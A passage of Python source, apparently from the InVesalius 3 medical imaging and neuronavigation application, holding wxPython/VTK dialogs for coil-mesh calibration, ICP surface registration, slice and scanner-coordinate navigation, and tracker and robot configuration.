wx.ICON_QUESTION | wx.YES_NO)
answer = dlg.ShowModal()
dlg.Destroy()
if answer == wx.ID_YES:
return 1
else: # answer == wx.ID_NO:
return 0
def LoadObject(self):
self.use_default_object = self.ObjectImportDialog()
if not self.use_default_object:
filename = ShowImportMeshFilesDialog()
if filename:
if filename.lower().endswith('.stl'):
reader = vtk.vtkSTLReader()
elif filename.lower().endswith('.ply'):
reader = vtk.vtkPLYReader()
elif filename.lower().endswith('.obj'):
reader = vtk.vtkOBJReader()
elif filename.lower().endswith('.vtp'):
reader = vtk.vtkXMLPolyDataReader()
else:
wx.MessageBox(_("File format not recognized by InVesalius"), _("Import surface error"))
return
else:
filename = os.path.join(inv_paths.OBJ_DIR, "magstim_fig8_coil.stl")
reader = vtk.vtkSTLReader()
# XXX: If the user cancels the dialog for importing the coil mesh file, the current behavior is to
# use the default object after all. A more logical behavior in that case would be to cancel the
# whole object calibration, but implementing that would need larger refactoring.
#
self.use_default_object = True
else:
filename = os.path.join(inv_paths.OBJ_DIR, "magstim_fig8_coil.stl")
reader = vtk.vtkSTLReader()
if _has_win32api:
self.obj_name = win32api.GetShortPathName(filename).encode(const.FS_ENCODE)
else:
self.obj_name = filename.encode(const.FS_ENCODE)
reader.SetFileName(self.obj_name)
reader.Update()
polydata = reader.GetOutput()
self.polydata = polydata
if polydata.GetNumberOfPoints() == 0:
wx.MessageBox(_("InVesalius was not able to import this surface"), _("Import surface error"))
transform = vtk.vtkTransform()
transform.RotateZ(90)
transform_filt = vtk.vtkTransformPolyDataFilter()
transform_filt.SetTransform(transform)
transform_filt.SetInputData(polydata)
transform_filt.Update()
normals = vtk.vtkPolyDataNormals()
normals.SetInputData(transform_filt.GetOutput())
normals.SetFeatureAngle(80)
normals.AutoOrientNormalsOn()
normals.Update()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(normals.GetOutput())
mapper.ScalarVisibilityOff()
#mapper.ImmediateModeRenderingOn()
obj_actor = vtk.vtkActor()
obj_actor.SetMapper(mapper)
self.ball_actors[0], self.text_actors[0] = self.OnCreateObjectText('Left', (0,55,0))
self.ball_actors[1], self.text_actors[1] = self.OnCreateObjectText('Right', (0,-55,0))
self.ball_actors[2], self.text_actors[2] = self.OnCreateObjectText('Anterior', (23,0,0))
self.ren.AddActor(obj_actor)
self.ren.ResetCamera()
self.interactor.Render()
def OnCreateObjectText(self, name, coord):
ball_source = vtk.vtkSphereSource()
ball_source.SetRadius(3)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(ball_source.GetOutputPort())
ball_actor = vtk.vtkActor()
ball_actor.SetMapper(mapper)
ball_actor.SetPosition(coord)
ball_actor.GetProperty().SetColor(1, 0, 0)
textSource = vtk.vtkVectorText()
textSource.SetText(name)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(textSource.GetOutputPort())
tactor = vtk.vtkFollower()
tactor.SetMapper(mapper)
tactor.GetProperty().SetColor(1.0, 0.0, 0.0)
tactor.SetScale(5)
ball_position = ball_actor.GetPosition()
tactor.SetPosition(ball_position[0]+5, ball_position[1]+5, ball_position[2]+10)
self.ren.AddActor(tactor)
tactor.SetCamera(self.ren.GetActiveCamera())
self.ren.AddActor(ball_actor)
return ball_actor, tactor
def OnObjectFiducialButton(self, index, evt, ctrl):
if not self.tracker.IsTrackerInitialized():
ShowNavigationTrackerWarning(0, 'choose')
return
# TODO: The code below until the end of the function is essentially copy-paste from
# OnTrackerFiducials function in NeuronavigationPanel class. Probably the easiest
# way to deduplicate this would be to create a Fiducial class, which would contain
# this code just once.
#
# Do not allow several object fiducials to be set at the same time.
if self.object_fiducial_being_set is not None and self.object_fiducial_being_set != index:
ctrl.SetValue(False)
return
# Called when the button for setting the object fiducial is enabled and either pedal is pressed
# or the button is pressed again.
#
def set_fiducial_callback(state):
if state:
Publisher.sendMessage('Set object fiducial', fiducial_index=index)
ctrl.SetValue(False)
self.object_fiducial_being_set = None
if ctrl.GetValue():
self.object_fiducial_being_set = index
if self.pedal_connection is not None:
self.pedal_connection.add_callback(
name='fiducial',
callback=set_fiducial_callback,
remove_when_released=True,
)
else:
set_fiducial_callback(True)
if self.pedal_connection is not None:
self.pedal_connection.remove_callback(name='fiducial')
def SetObjectFiducial(self, fiducial_index):
coord, coord_raw = self.tracker.GetTrackerCoordinates(
# XXX: Always use static reference mode when getting the coordinates. This is what the
# code did previously, as well. At some point, it should probably be thought through
# if this is actually what we want or if it should be changed somehow.
#
ref_mode_id=const.STATIC_REF,
n_samples=const.CALIBRATION_TRACKER_SAMPLES,
)
# XXX: The condition below happens when setting the "fixed" coordinate in the object calibration.
# The case is not handled by GetTrackerCoordinates function, therefore redo some computation
# that is already done once by GetTrackerCoordinates, namely, invert the y-coordinate.
#
# (What is done here does not seem to be completely consistent with "always use static reference
# mode" principle above, but it's hard to come up with a simple change to increase the consistency
# and not change the function to the point of potentially breaking it.)
#
if self.obj_ref_id and fiducial_index == 4:
if self.tracker_id == const.ROBOT:
trck_init_robot = self.trk_init[1][0]
coord = trck_init_robot.Run()
else:
coord = coord_raw[self.obj_ref_id, :]
else:
coord = coord_raw[0, :]
if fiducial_index == 3:
coord = np.zeros([6,])
# Update text controls with tracker coordinates
if coord is not None or np.sum(coord) != 0.0:
self.obj_fiducials[fiducial_index, :] = coord[:3]
self.obj_orients[fiducial_index, :] = coord[3:]
for i in [0, 1, 2]:
self.txt_coord[fiducial_index][i].SetLabel(str(round(coord[i], 1)))
if self.text_actors[fiducial_index]:
self.text_actors[fiducial_index].GetProperty().SetColor(0.0, 1.0, 0.0)
self.ball_actors[fiducial_index].GetProperty().SetColor(0.0, 1.0, 0.0)
self.Refresh()
else:
ShowNavigationTrackerWarning(0, 'choose')
def OnChooseReferenceMode(self, evt):
# When ref mode is changed the tracker coordinates are set to nan
# This is for Polhemus FASTRAK wrapper, where the sensor attached to the object can be the stylus (Static
# reference - Selection 0 - index 0 for coordinates) or can be a 3rd sensor (Dynamic reference - Selection 1 -
# index 2 for coordinates)
# I use the index 2 directly here to send to the coregistration module where it is possible to access without
# any conditional statement the correct index of coordinates.
if evt.GetSelection() == 1:
self.obj_ref_id = 2
if self.tracker_id in [const.FASTRAK, const.DEBUGTRACKRANDOM, const.DEBUGTRACKAPPROACH]:
self.choice_sensor.Show(self.obj_ref_id)
else:
self.obj_ref_id = 0
self.choice_sensor.Show(self.obj_ref_id)
for m in range(0, 5):
self.obj_fiducials[m, :] = np.full([1, 3], np.nan)
self.obj_orients[m, :] = np.full([1, 3], np.nan)
for n in range(0, 3):
self.txt_coord[m][n].SetLabel('-')
# Used to update choice sensor controls
self.Layout()
def OnChoiceFTSensor(self, evt):
if evt.GetSelection():
self.obj_ref_id = 3
else:
self.obj_ref_id = 0
def GetValue(self):
return self.obj_fiducials, self.obj_orients, self.obj_ref_id, self.obj_name, self.polydata, self.use_default_object
class ICPCorregistrationDialog(wx.Dialog):
def __init__(self, nav_prop):
import invesalius.project as prj
self.m_change = nav_prop[0]
self.tracker = nav_prop[1]
self.obj_ref_id = 2
self.obj_name = None
self.obj_actor = None
self.polydata = None
self.m_icp = None
self.initial_focus = None
self.prev_error = None
self.final_error = None
self.icp_mode = 0
self.staticballs = []
self.point_coord = []
self.transformed_points = []
self.obj_fiducials = np.full([5, 3], np.nan)
self.obj_orients = np.full([5, 3], np.nan)
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, _(u"Refine Corregistration"), size=(380, 440),
style=wx.DEFAULT_DIALOG_STYLE | wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self.proj = prj.Project()
self._init_gui()
def _init_gui(self):
self.interactor = wxVTKRenderWindowInteractor(self, -1, size=self.GetSize())
self.interactor.Enable(1)
self.ren = vtk.vtkRenderer()
self.interactor.GetRenderWindow().AddRenderer(self.ren)
self.timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnUpdate, self.timer)
txt_surface = wx.StaticText(self, -1, _('Select the surface:'))
txt_mode = wx.StaticText(self, -1, _('Registration mode:'))
combo_surface_name = wx.ComboBox(self, -1, size=(210, 23),
style=wx.CB_DROPDOWN | wx.CB_READONLY)
# combo_surface_name.SetSelection(0)
if sys.platform != 'win32':
combo_surface_name.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
combo_surface_name.Bind(wx.EVT_COMBOBOX, self.OnComboName)
for n in range(len(self.proj.surface_dict)):
combo_surface_name.Insert(str(self.proj.surface_dict[n].name), n)
self.combo_surface_name = combo_surface_name
init_surface = 0
combo_surface_name.SetSelection(init_surface)
self.surface = self.proj.surface_dict[init_surface].polydata
self.LoadActor()
tooltip = wx.ToolTip(_("Choose the registration mode:"))
choice_icp_method = wx.ComboBox(self, -1, "", size=(100, 23),
choices=([_("Affine"), _("Similarity"), _("RigidBody")]),
style=wx.CB_DROPDOWN|wx.CB_READONLY)
choice_icp_method.SetSelection(0)
choice_icp_method.SetToolTip(tooltip)
choice_icp_method.Bind(wx.EVT_COMBOBOX, self.OnChoiceICPMethod)
# Buttons to acquire and remove points
create_point = wx.Button(self, -1, label=_('Create point'))
create_point.Bind(wx.EVT_BUTTON, self.OnCreatePoint)
cont_point = wx.ToggleButton(self, -1, label=_('Continuous acquisition'))
cont_point.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnContinuousAcquisition, btn=cont_point))
self.cont_point = cont_point
btn_reset = wx.Button(self, -1, label=_('Remove points'))
btn_reset.Bind(wx.EVT_BUTTON, self.OnReset)
btn_apply_icp = wx.Button(self, -1, label=_('Apply registration'))
btn_apply_icp.Bind(wx.EVT_BUTTON, self.OnICP)
btn_apply_icp.Enable(False)
self.btn_apply_icp = btn_apply_icp
tooltip = wx.ToolTip(_(u"Refine done"))
btn_ok = wx.Button(self, wx.ID_OK, _(u"Done"))
btn_ok.SetToolTip(tooltip)
btn_ok.Enable(False)
self.btn_ok = btn_ok
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
top_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=50, vgap=5)
top_sizer.AddMany([txt_surface, txt_mode,
combo_surface_name, choice_icp_method])
btn_acqui_sizer = wx.FlexGridSizer(rows=1, cols=3, hgap=15, vgap=15)
btn_acqui_sizer.AddMany([create_point, cont_point, btn_reset])
btn_ok_sizer = wx.FlexGridSizer(rows=1, cols=3, hgap=20, vgap=20)
btn_ok_sizer.AddMany([btn_apply_icp, btn_ok, btn_cancel])
btn_sizer = wx.FlexGridSizer(rows=2, cols=1, hgap=50, vgap=20)
btn_sizer.AddMany([(btn_acqui_sizer, 1, wx.ALIGN_CENTER_HORIZONTAL),
(btn_ok_sizer, 1, wx.ALIGN_RIGHT)])
self.progress = wx.Gauge(self, -1)
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(top_sizer, 0, wx.LEFT|wx.TOP|wx.BOTTOM, 10)
main_sizer.Add(self.interactor, 0, wx.EXPAND)
main_sizer.Add(btn_sizer, 0,
wx.EXPAND|wx.GROW|wx.LEFT|wx.TOP|wx.BOTTOM, 10)
main_sizer.Add(self.progress, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(main_sizer)
main_sizer.Fit(self)
def LoadActor(self):
'''
Load the selected actor from the project (self.surface) into the scene
:return:
'''
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(self.surface)
mapper.ScalarVisibilityOff()
#mapper.ImmediateModeRenderingOn()
obj_actor = vtk.vtkActor()
obj_actor.SetMapper(mapper)
self.obj_actor = obj_actor
poses_recorded = vtku.Text()
poses_recorded.SetSize(const.TEXT_SIZE_LARGE)
poses_recorded.SetPosition((const.X, const.Y))
poses_recorded.ShadowOff()
poses_recorded.SetValue("Poses recorded: ")
collect_points = vtku.Text()
collect_points.SetSize(const.TEXT_SIZE_LARGE)
collect_points.SetPosition((const.X+0.35, const.Y))
collect_points.ShadowOff()
collect_points.SetValue("0")
self.collect_points = collect_points
self.ren.AddActor(obj_actor)
self.ren.AddActor(poses_recorded.actor)
self.ren.AddActor(collect_points.actor)
self.ren.ResetCamera()
self.interactor.Render()
def RemoveActor(self):
self.ren.RemoveAllViewProps()
self.point_coord = []
self.transformed_points = []
self.m_icp = None
self.SetProgress(0)
self.btn_apply_icp.Enable(False)
self.btn_ok.Enable(False)
self.ren.ResetCamera()
self.interactor.Render()
def GetCurrentCoord(self):
coord_raw, markers_flag = self.tracker.TrackerCoordinates.GetCoordinates()
coord, _ = dcr.corregistrate_dynamic((self.m_change, 0), coord_raw, const.DEFAULT_REF_MODE, [None, None])
return coord[:3]
def AddMarker(self, size, colour, coord):
"""
Points are rendered into the scene. These points give visual information about the registration.
:param size: value of the marker size
:type size: int
:param colour: RGB Color Code for the marker
:type colour: tuple (int(R),int(G),int(B))
:param coord: x, y, z of the marker
:type coord: np.ndarray
"""
x, y, z = coord[0], -coord[1], coord[2]
ball_ref = vtk.vtkSphereSource()
ball_ref.SetRadius(size)
ball_ref.SetCenter(x, y, z)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(ball_ref.GetOutputPort())
prop = vtk.vtkProperty()
prop.SetColor(colour[0:3])
#adding a new actor for the present ball
sphere_actor = vtk.vtkActor()
sphere_actor.SetMapper(mapper)
sphere_actor.SetProperty(prop)
self.ren.AddActor(sphere_actor)
self.point_coord.append([x, y, z])
self.collect_points.SetValue(str(int(self.collect_points.GetValue()) + 1))
self.interactor.Render()
if len(self.point_coord) >= 5 and self.btn_apply_icp.IsEnabled() is False:
self.btn_apply_icp.Enable(True)
if self.progress.GetValue() != 0:
self.SetProgress(0)
def SetProgress(self, progress):
self.progress.SetValue(progress * 100)
self.interactor.Render()
def vtkmatrix_to_numpy(self, matrix):
"""
Copies the elements of a vtkMatrix4x4 into a numpy array.
:param matrix: The matrix to be copied into an array.
:type matrix: vtk.vtkMatrix4x4
:rtype: numpy.ndarray
"""
m = np.ones((4, 4))
for i in range(4):
for j in range(4):
m[i, j] = matrix.GetElement(i, j)
return m
def SetCameraVolume(self, position):
"""
Positioning of the camera based on the acquired point
:param position: x, y, z of the last acquired point
:return:
"""
cam_focus = np.array([position[0], -position[1], position[2]])
cam = self.ren.GetActiveCamera()
if self.initial_focus is None:
self.initial_focus = np.array(cam.GetFocalPoint())
cam_pos0 = np.array(cam.GetPosition())
cam_focus0 = np.array(cam.GetFocalPoint())
v0 = cam_pos0 - cam_focus0
v0n = np.sqrt(inner1d(v0, v0))
v1 = (cam_focus - self.initial_focus)
v1n = np.sqrt(inner1d(v1, v1))
if not v1n:
v1n = 1.0
cam_pos = (v1/v1n)*v0n + cam_focus
cam.SetFocalPoint(cam_focus)
cam.SetPosition(cam_pos)
self.interactor.Render()
def ErrorEstimation(self, surface, points):
"""
Estimation of the average squared distance between the cloud of points to the closest mesh
:param surface: Surface polydata of the scene
:type surface: vtk.polydata
:param points: Cloud of points
:type points: np.ndarray
:return: mean distance
"""
cell_locator = vtk.vtkCellLocator()
cell_locator.SetDataSet(surface)
cell_locator.BuildLocator()
cellId = vtk.mutable(0)
c = [0.0, 0.0, 0.0]
subId = vtk.mutable(0)
d = vtk.mutable(0.0)
error = []
for i in range(len(points)):
cell_locator.FindClosestPoint(points[i], c, cellId, subId, d)
error.append(np.sqrt(float(d)))
return np.mean(error)
def OnComboName(self, evt):
surface_name = evt.GetString()
surface_index = evt.GetSelection()
self.surface = self.proj.surface_dict[surface_index].polydata
if self.obj_actor:
self.RemoveActor()
self.LoadActor()
def OnChoiceICPMethod(self, evt):
self.icp_mode = evt.GetSelection()
def OnContinuousAcquisition(self, evt=None, btn=None):
value = btn.GetValue()
if value:
self.timer.Start(500)
else:
self.timer.Stop()
def OnUpdate(self, evt):
current_coord = self.GetCurrentCoord()
self.AddMarker(3, (1, 0, 0), current_coord)
self.SetCameraVolume(current_coord)
def OnCreatePoint(self, evt):
current_coord = self.GetCurrentCoord()
self.AddMarker(3, (1, 0, 0), current_coord)
self.SetCameraVolume(current_coord)
def OnReset(self, evt):
if self.cont_point:
self.cont_point.SetValue(False)
self.OnContinuousAcquisition(evt=None, btn=self.cont_point)
self.RemoveActor()
self.LoadActor()
def OnICP(self, evt):
if self.cont_point:
self.cont_point.SetValue(False)
self.OnContinuousAcquisition(evt=None, btn=self.cont_point)
self.SetProgress(0.3)
time.sleep(1)
sourcePoints = np.array(self.point_coord)
sourcePoints_vtk = vtk.vtkPoints()
for i in range(len(sourcePoints)):
id0 = sourcePoints_vtk.InsertNextPoint(sourcePoints[i])
source = vtk.vtkPolyData()
source.SetPoints(sourcePoints_vtk)
icp = vtk.vtkIterativeClosestPointTransform()
icp.SetSource(source)
icp.SetTarget(self.surface)
self.SetProgress(0.5)
if self.icp_mode == 0:
print("Affine mode")
icp.GetLandmarkTransform().SetModeToAffine()
elif self.icp_mode == 1:
print("Similarity mode")
icp.GetLandmarkTransform().SetModeToSimilarity()
elif self.icp_mode == 2:
print("Rigid mode")
icp.GetLandmarkTransform().SetModeToRigidBody()
#icp.DebugOn()
icp.SetMaximumNumberOfIterations(1000)
icp.Modified()
icp.Update()
self.m_icp = self.vtkmatrix_to_numpy(icp.GetMatrix())
icpTransformFilter = vtk.vtkTransformPolyDataFilter()
icpTransformFilter.SetInputData(source)
icpTransformFilter.SetTransform(icp)
icpTransformFilter.Update()
transformedSource = icpTransformFilter.GetOutput()
for i in range(transformedSource.GetNumberOfPoints()):
p = [0, 0, 0]
transformedSource.GetPoint(i, p)
self.transformed_points.append(p)
point = vtk.vtkSphereSource()
point.SetCenter(p)
point.SetRadius(3)
point.SetPhiResolution(3)
point.SetThetaResolution(3)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(point.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor((0,1,0))
self.ren.AddActor(actor)
self.prev_error = self.ErrorEstimation(self.surface, sourcePoints)
self.final_error = self.ErrorEstimation(self.surface, self.transformed_points)
self.interactor.Render()
self.SetProgress(1)
self.btn_ok.Enable(True)
def GetValue(self):
return self.m_icp, self.point_coord, self.transformed_points, self.prev_error, self.final_error
class SurfaceProgressWindow(object):
def __init__(self):
self.title = "InVesalius 3"
self.msg = _("Creating 3D surface ...")
self.style = wx.PD_APP_MODAL | wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME
self.dlg = wx.ProgressDialog(self.title,
self.msg,
parent=None,
style=self.style)
self.running = True
self.error = None
self.dlg.Show()
def WasCancelled(self):
# print("Cancelled?", self.dlg.WasCancelled())
return self.dlg.WasCancelled()
def Update(self, msg=None, value=None):
if msg is None:
self.dlg.Pulse()
else:
self.dlg.Pulse(msg)
def Close(self):
self.dlg.Destroy()
class GoToDialog(wx.Dialog):
def __init__(self, title=_("Go to slice ..."), init_orientation=const.AXIAL_STR):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self._init_gui(init_orientation)
def _init_gui(self, init_orientation):
orientations = (
(_("Axial"), const.AXIAL_STR),
(_("Coronal"), const.CORONAL_STR),
(_("Sagital"), const.SAGITAL_STR),
)
self.goto_slice = wx.TextCtrl(self, -1, "")
self.goto_orientation = wx.ComboBox(self, -1, style=wx.CB_DROPDOWN|wx.CB_READONLY)
cb_init = 0
for n, orientation in enumerate(orientations):
self.goto_orientation.Append(*orientation)
if orientation[1] == init_orientation:
cb_init = n
self.goto_orientation.SetSelection(cb_init)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
slice_sizer = wx.BoxSizer(wx.HORIZONTAL)
slice_sizer.Add(wx.StaticText(self, -1, _("Slice number"), style=wx.ALIGN_CENTER), 0, wx.ALIGN_CENTER|wx.RIGHT, 5)
slice_sizer.Add(self.goto_slice, 1, wx.EXPAND)
main_sizer.Add((5, 5))
main_sizer.Add(slice_sizer, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(self.goto_orientation, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.orientation = None
self.__bind_events()
btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
def __bind_events(self):
Publisher.subscribe(self.SetNewFocalPoint,'Cross focal point')
def OnOk(self, evt):
try:
slice_number = int(self.goto_slice.GetValue())
orientation = self.orientation = self.goto_orientation.GetClientData(self.goto_orientation.GetSelection())
Publisher.sendMessage(("Set scroll position", orientation), index=slice_number)
Publisher.sendMessage('Set Update cross pos')
except ValueError:
pass
self.Close()
def SetNewFocalPoint(self, coord, spacing):
newCoord = list(coord)
if self.orientation=='AXIAL':
newCoord[2] = int(self.goto_slice.GetValue())*spacing[2]
if self.orientation == 'CORONAL':
newCoord[1] = int(self.goto_slice.GetValue())*spacing[1]
if self.orientation == 'SAGITAL':
newCoord[0] = int(self.goto_slice.GetValue())*spacing[0]
Publisher.sendMessage('Update cross pos', coord = newCoord)
def Close(self):
wx.Dialog.Close(self)
self.Destroy()
class GoToDialogScannerCoord(wx.Dialog):
def __init__(self, title=_("Go to scanner coord...")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP)
self._init_gui()
def _init_gui(self):
self.goto_sagital = wx.TextCtrl(self, size=(50,-1))
self.goto_coronal = wx.TextCtrl(self, size=(50,-1))
self.goto_axial = wx.TextCtrl(self, size=(50,-1))
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
sizer_create = wx.FlexGridSizer(3, 2, 10, 10)
sizer_create.AddMany([(wx.StaticText(self, 1, _("Sagital coordinate:")), 1, wx.LEFT, 10), (self.goto_sagital, 1, wx.RIGHT, 10),
(wx.StaticText(self, 1, _("Coronal coordinate:")), 1, wx.LEFT, 10), (self.goto_coronal, 1, wx.RIGHT, 10),
(wx.StaticText(self, 1, _("Axial coordinate:")), 1, wx.LEFT, 10), (self.goto_axial, 1, wx.RIGHT, 10)])
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(sizer_create, proportion=3, flag=wx.CENTER, border=20)
main_sizer.Add(btnsizer, proportion=1, flag=wx.CENTER|wx.TOP, border=5)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.orientation = None
self.affine = np.identity(4)
self.__bind_events()
btn_ok.Bind(wx.EVT_BUTTON, self.OnOk)
def __bind_events(self):
Publisher.subscribe(self.SetNewFocalPoint, 'Cross focal point')
def SetNewFocalPoint(self, coord, spacing):
Publisher.sendMessage('Update cross pos', coord=self.result*spacing)
def OnOk(self, evt):
import invesalius.data.slice_ as slc
try:
point = [float(self.goto_sagital.GetValue()),
float(self.goto_coronal.GetValue()),
float(self.goto_axial.GetValue())]
# transformation from scanner coordinates to inv coord system
affine_inverse = np.linalg.inv(slc.Slice().affine)
self.result = np.dot(affine_inverse[:3, :3], np.transpose(point[0:3])) + affine_inverse[:3, 3]
self.result[1] = slc.Slice().GetMaxSliceNumber(const.CORONAL_STR) - self.result[1]
Publisher.sendMessage('Update status text in GUI', label=_("Calculating the transformation ..."))
Publisher.sendMessage('Set Update cross pos')
Publisher.sendMessage("Toggle Cross", id=const.SLICE_STATE_CROSS)
Publisher.sendMessage('Update status text in GUI', label=_("Ready"))
except ValueError:
pass
self.Close()
def Close(self):
wx.Dialog.Close(self)
self.Destroy()
class SetOptitrackconfigs(wx.Dialog):
def __init__(self, title=_("Setting Optitrack configs:")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
self._init_gui()
def _init_gui(self):
session = ses.Session()
last_optitrack_cal_dir = session.get('paths', 'last_optitrack_cal_dir', '')
last_optitrack_User_Profile_dir = session.get('paths', 'last_optitrack_User_Profile_dir', '')
if not last_optitrack_cal_dir:
last_optitrack_cal_dir = inv_paths.OPTITRACK_CAL_DIR
if not last_optitrack_User_Profile_dir:
last_optitrack_User_Profile_dir = inv_paths.OPTITRACK_USERPROFILE_DIR
self.dir_cal = wx.FilePickerCtrl(self, path=last_optitrack_cal_dir, style=wx.FLP_USE_TEXTCTRL | wx.FLP_SMALL,
wildcard="Cal files (*.cal)|*.cal", message="Select Calibration file")
row_cal = wx.BoxSizer(wx.VERTICAL)
row_cal.Add(wx.StaticText(self, wx.ID_ANY, "Select Calibration file"), 0, wx.TOP | wx.RIGHT, 5)
row_cal.Add(self.dir_cal, 0, wx.ALL | wx.CENTER | wx.EXPAND)
self.dir_UserProfile = wx.FilePickerCtrl(self, path=last_optitrack_User_Profile_dir, style=wx.FLP_USE_TEXTCTRL | wx.FLP_SMALL,
wildcard="User Profile files (*.motive)|*.motive", message="Select User Profile file")
row_userprofile = wx.BoxSizer(wx.VERTICAL)
row_userprofile.Add(wx.StaticText(self, wx.ID_ANY, "Select User Profile file"), 0, wx.TOP | wx.RIGHT, 5)
row_userprofile.Add(self.dir_UserProfile, 0, wx.ALL | wx.CENTER | wx.EXPAND)
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(row_cal, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
main_sizer.Add((5, 5))
main_sizer.Add(row_userprofile, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5)
main_sizer.Add((15, 15))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.CenterOnParent()
def GetValue(self):
fn_cal = self.dir_cal.GetPath()
fn_userprofile = self.dir_UserProfile.GetPath()
if fn_cal and fn_userprofile:
session = ses.Session()
session['paths']['last_optitrack_cal_dir'] = self.dir_cal.GetPath()
session['paths']['last_optitrack_User_Profile_dir'] = self.dir_UserProfile.GetPath()
session.WriteSessionFile()
return fn_cal, fn_userprofile
class SetTrackerDeviceToRobot(wx.Dialog):
"""
Robot navigation requires a tracker device to tracker the head position and the object (coil) position.
A dialog pops up showing a combobox with all trackers but debugs and the robot itself (const.TRACKERS[:-3])
"""
def __init__(self, title=_("Setting tracker device:")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
self.tracker_id = const.DEFAULT_TRACKER
self._init_gui()
def _init_gui(self):
# ComboBox for spatial tracker device selection
tooltip = wx.ToolTip(_("Choose the tracking device"))
trackers = const.TRACKERS
if not ses.Session().debug:
del trackers[-3:]
tracker_options = [_("Select tracker:")] + trackers
choice_trck = wx.ComboBox(self, -1, "",
choices=tracker_options, style=wx.CB_DROPDOWN | wx.CB_READONLY)
choice_trck.SetToolTip(tooltip)
choice_trck.SetSelection(const.DEFAULT_TRACKER)
choice_trck.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceTracker, ctrl=choice_trck))
btn_ok = wx.Button(self, wx.ID_OK)
btn_ok.SetHelpText("")
btn_ok.SetDefault()
btn_cancel = wx.Button(self, wx.ID_CANCEL)
btn_cancel.SetHelpText("")
btnsizer = wx.StdDialogButtonSizer()
btnsizer.AddButton(btn_ok)
btnsizer.AddButton(btn_cancel)
btnsizer.Realize()
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add((5, 5))
main_sizer.Add(choice_trck, 1, wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add((15, 15))
main_sizer.Add(btnsizer, 0, wx.EXPAND)
main_sizer.Add((5, 5))
self.SetSizer(main_sizer)
main_sizer.Fit(self)
self.CenterOnParent()
def OnChoiceTracker(self, evt, ctrl):
choice = evt.GetSelection()
self.tracker_id = choice
def GetValue(self):
return self.tracker_id
class SetRobotIP(wx.Dialog):
def __init__(self, title=_("Setting Robot IP")):
wx.Dialog.__init__(self, wx.GetApp().GetTopWindow(), -1, title, size=wx.Size(1000, 200),
style=wx.DEFAULT_DIALOG_STYLE|wx.FRAME_FLOAT_ON_PARENT|wx.STAY_ON_TOP|wx.RESIZE_BORDER)
self.robot_ip = None
self._init_gui()
def _init_gui(self):
# ComboBox for spatial tracker device selection
tooltip = wx.ToolTip(_("Choose or type the robot IP"))
robot_ip_options = [_("Select robot IP:")] + const.ROBOT_ElFIN_IP
choice_IP = wx.ComboBox(self, -1, "",
